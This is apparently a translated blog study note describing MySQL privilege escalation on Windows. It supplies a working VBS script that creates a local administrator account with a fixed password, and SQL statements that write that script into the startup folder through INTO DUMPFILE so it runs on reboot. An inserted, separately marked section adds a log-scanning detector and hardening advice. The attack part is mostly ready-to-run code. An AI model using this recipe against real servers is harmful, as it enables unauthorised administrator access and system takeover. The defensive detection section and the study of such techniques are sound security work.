Day 4: MySQL privilege escalation study (startup-item privilege escalation)

0x00 Principle

When the server restarts, it automatically runs the VBS script that was imported into the C:\Documents and Settings\All Users\「开始」菜单\程序\启动 directory, and the script executes the commands that add a user and escalate its privileges.

0x01 Exploitation conditions

The startup item can be used for privilege escalation in either of the following two cases:
1. The C:\Documents and Settings\All Users\「开始」菜单\程序\启动 directory is readable and writable, so the VBS privilege escalation script can be uploaded to it directly.

2. You can log in to MySQL with the root account.

0x02 The key to privilege escalation

The VBS script in the startup directory.

0x03 Privilege escalation steps

1. Upload the VBS privilege escalation script to the startup directory
The VBS privilege escalation script is as follows:

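' Bind to the local machine through the WinNT ADSI provider
Set wsnetwork = CreateObject("WSCRIPT.NETWORK")
os = "WinNT://" & wsnetwork.ComputerName
Set ob = GetObject(os)
Set oe = GetObject(os & "/Administrators,group")
' Create the local user quan and set its password
Set od = ob.Create("user", "quan")
od.SetPassword "123456"
od.SetInfo
Set of = GetObject(os & "/quan", user)
' Add quan to the local Administrators group
oe.add os & "/quan"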

2. Import the contents of a database table into the startup directory
1. Log in to MySQL.
2. Create a new table in the test database:

create table secist(cmd text);

3. Insert the VBS script

insert into secist values("set wshshell=createobject(""wscript.shell"")");
insert into secist values("a=wshshell.run(""cmd.exe /c net user quan 123456 /add"",0)");
insert into secist values("b=wshshell.run(""cmd.exe /c net localgroup administrators quan /add"",0)");

4. Export the VBS script to the startup directory

select * from secist into dumpfile "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\quan.vbs";

5. Use some other means to get the server restarted; once it has restarted, the privilege escalation succeeds.
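
The defensive counterpart to steps 3 to 5, added here as an example that is not part of the original post: it scans a MySQL general query log for INTO OUTFILE / INTO DUMPFILE statements and flags those whose target lies in a Windows startup folder. The log layout (MySQL 5.7-style general log), the sample lines and the function names are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Assumed log layout: time, connection id, command, statement.
LOG_LINE = re.compile(r"^(\S+)\s+(\d+)\s+Query\s+(.*)$")
# SELECT ... INTO OUTFILE/DUMPFILE '<path>': the server-side file write used in step 4.
FILE_WRITE = re.compile(r"\binto\s+(outfile|dumpfile)\s+(['\"])(.+?)\2", re.I)
# Folder names Windows runs at logon: the zh-CN name from the page and the English name.
AUTOSTART_DIRS = {"启动", "startup"}

# Constructed sample log, not captured from a real server.
SAMPLE_LOG = r'''
2019-12-17T08:14:58.000000Z    12 Query  create table secist(cmd text)
2019-12-17T08:15:02.000000Z    12 Query  select * from secist into dumpfile "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\quan.vbs"
2019-12-17T09:00:00.000000Z    31 Query  SELECT id, total FROM orders INTO OUTFILE 'D:/exports/orders.csv'
2019-12-17T09:00:05.000000Z    31 Query  select 1
'''

def classify(statement):
    """Return None when the statement writes no file, else mode, path and severity."""
    m = FILE_WRITE.search(statement)
    if not m:
        return None
    # Accept C:\x, C:\\x and C:/x spellings of the same path.
    raw = m.group(3).replace("\\\\", "\\").replace("/", "\\")
    path = PureWindowsPath(raw)
    parent_dirs = {part.lower() for part in path.parts[:-1]}
    severity = "critical" if parent_dirs & AUTOSTART_DIRS else "review"
    return {"mode": m.group(1).lower(), "path": str(path), "severity": severity}

def scan(log_text):
    """Collect one finding per Query line that writes a file on the server."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        hit = classify(m.group(3))
        if hit:
            findings.append({"time": m.group(1), "conn": int(m.group(2)), **hit})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

On the server itself, restricting secure_file_priv to a dedicated directory (or NULL) and not granting the FILE privilege to application accounts closes the write path that step 4 depends on.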

0x04 References

https://www.cnblogs.com/wh4am1/p/6613759.html
"Network Attack and Defense Actual Combat Research-Vulnerability Exploitation and Privilege Escalation" 5.7.2

Origin blog.csdn.net/syy0201/article/details/103582082